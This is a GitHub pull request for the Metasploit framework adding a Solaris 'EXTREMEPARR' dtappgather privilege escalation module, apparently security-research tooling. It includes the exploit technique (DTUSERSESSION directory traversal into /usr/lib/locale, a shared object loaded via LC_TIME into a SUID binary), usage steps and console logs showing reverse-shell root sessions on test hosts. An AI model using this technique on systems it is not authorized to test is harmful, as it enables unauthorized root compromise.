Skip to content

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module#10663

Merged
h00die merged 3 commits intorapid7:masterfrom
bcoles:extremeparr_dtappgather_priv_esc
Sep 23, 2018
Merged

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module#10663
h00die merged 3 commits intorapid7:masterfrom
bcoles:extremeparr_dtappgather_priv_esc

Conversation

@bcoles
Copy link
Contributor

@bcoles bcoles commented Sep 18, 2018
edited by h00die
Loading

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module.

    This module exploits a directory traversal vulnerability in the
    `dtappgather` executable included with Common Desktop Environment (CDE)
    on unpatched Solaris systems prior to Solaris 10u11 which allows users
    to gain root privileges.

    dtappgather allows users to create a user-owned directory at any
    location on the filesystem using the `DTUSERSESSION` environment
    variable.

    This module creates a directory in `/usr/lib/locale`, writes a shared
    object to the directory, and runs the specified SUID binary with the
    shared object loaded using the `LC_TIME` environment variable.

    This module has been tested successfully on:

    Solaris 9u7 (09/04) (x86);
    Solaris 10u1 (01/06) (x86);
    Solaris 10u2 (06/06) (x86);
    Solaris 10u4 (08/07) (x86);
    Solaris 10u8 (10/09) (x86);

Verification

  • Start msfconsole
  • Get a session
  • use exploit/solaris/local/extremeparr_dtappgather_priv_esc
  • set SESSION [SESSION]
  • run
  • You should get a new root session

Output

msf5 > use exploit/solaris/local/extremeparr_dtappgather_priv_esc 
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1
session => 1
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196
lhost => 172.16.191.196
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.196:4444 
[+] Created directory /usr/lib/locale/ExDmW
[*] Writing '/tmp/.Wfy7WpcZej/.pv7h2R.c' (170 bytes) ...
[*] Writing '/tmp/.Wfy7WpcZej/.uGjK3nLc5' (175 bytes) ...
[*] Executing payload...
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R.c
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.2
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.3
[+] Deleted /tmp/.Wfy7WpcZej/.uGjK3nLc5
[+] Deleted /usr/lib/locale/ExDmW
[+] Deleted /tmp/.Wfy7WpcZej
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
cat /etc/release
                        Solaris 10 1/06 s10x_u1wos_19a X86
           Copyright 2005 Sun Microsystems, Inc.  All Rights Reserved.
                        Use is subject to license terms.
                           Assembled 07 December 2005

@bcoles bcoles added module docs hotness Something we're really excited about labels Sep 18, 2018
@h00die h00die mentioned this pull request Sep 18, 2018
Closed
9 tasks
@h00die
Copy link
Contributor

h00die commented Sep 21, 2018

Add 10u9 to the list.

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/PNjrx
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/PNjrx
[*] Creating directory '/tmp/.gfiAL'
[*] Writing '/tmp/.gfiAL/.Rh2z4O.c' (166 bytes) ...
[*] Max line length is 262145
[*] Writing 166 bytes in 1 chunks of 571 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/PNjrx
[*] Writing '/tmp/.gfiAL/.I4aGhLwn1y' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32797) at 2018-09-21 14:25:16 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.gfiAL/.Rh2z4O.c
[+] Deleted /tmp/.gfiAL/.Rh2z4O
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.2
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.3
[+] Deleted /tmp/.gfiAL/.I4aGhLwn1y
[+] Deleted /usr/lib/locale/PNjrx
[+] Deleted /tmp/.gfiAL

cat /etc/release
                    Oracle Solaris 10 9/10 s10x_u9wos_14a X86

@h00die h00die self-assigned this Sep 21, 2018
@h00die
Copy link
Contributor

h00die commented Sep 21, 2018
edited
Loading

11.3 fails (as expected since its not vulnerable, and the payload would have failed anyways)

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 2.2.2.2:4444 
[-] /usr/dt/bin/dtappgather is not setuid
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.

@h00die
Copy link
Contributor

h00die commented Sep 21, 2018

10u2

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/rpiRihd9
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/rpiRihd9
[*] Creating directory '/tmp/.4qKYd8wVkW'
[*] Writing '/tmp/.4qKYd8wVkW/.Jfbb7u.c' (170 bytes) ...
[*] Max line length is 262145
[*] Writing 170 bytes in 1 chunks of 586 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/rpiRihd9
[*] Writing '/tmp/.4qKYd8wVkW/.roWJo1POK' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32783) at 2018-09-21 15:02:37 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u.c
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.2
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.3
[+] Deleted /tmp/.4qKYd8wVkW/.roWJo1POK
[+] Deleted /usr/lib/locale/rpiRihd9
[+] Deleted /tmp/.4qKYd8wVkW

id
uid=0(root) gid=0(root)
^Z
Background session 2? [y/N]  y
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

id
uid=100(solaris) gid=1(other)

h00die
h00die reviewed Sep 23, 2018
View reviewed changes
modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb
end

def exploit
if is_root?
Copy link
Contributor

@h00die h00die Sep 23, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Any reason this is here and not in check?
Knowing you, there was a thought process behind the decision, just curious for consistency in other modules.

Copy link
Contributor

@h00die h00die Sep 23, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

if it were in check, it could be bypassed by the force exploit.
Not sure why someone would still want to run it while being root, but at least it leaves that option open

Copy link
Contributor Author

@bcoles bcoles Sep 23, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@h00die It's nice to be able to run the check method to determine whether a host is vulnerable, regardless of our current user context. The host is no more or less vulnerable if we're already root. If we're already root, the host isn't Safe.

There's a separate issue here, which is that there are instances where we'll want to execute the module, even if we are already root. In particular, the is_root? check is not namespace safe. It's quite possibly we'll have a session in a user namespace as root yet still want to execute the module to become real root UID 0.

I haven't had time to open an issue for discussion. My suggestion is to keep the is_root? check outside of the check method, while ensuring it is still included in a ForceExploit conditional in each module. However #10622 needs to be resolved before a code pattern can be developed and implemented in every local exploit module.

@h00die h00die merged commit 7687e6e into rapid7:master Sep 23, 2018
h00die added a commit that referenced this pull request Sep 23, 2018
@h00die
Land #10663 extremeparr solaris LPE
b486708
@h00die
Copy link
Contributor

h00die commented Sep 23, 2018
edited by gdavidson-r7
Loading

Release Notes

The Solaris EXTREMEPARR dtappgather module has been added to the framework. It exploits a direct traversal vulnerability in the dtappgather executable that is included on unpatched Solaris systems 10u11 and older. You can achieve root access with this exploit.

@bcoles bcoles deleted the extremeparr_dtappgather_priv_esc branch September 23, 2018 18:37
msjenkins-r7 pushed a commit that referenced this pull request Sep 24, 2018
@h00die @msjenkins-r7
Land #10663 extremeparr solaris LPE
c3f335e
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@h00die h00die h00die left review comments

Assignees

@h00die h00die

Labels

docs hotness Something we're really excited about module

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@bcoles @h00die @gdavidson-r7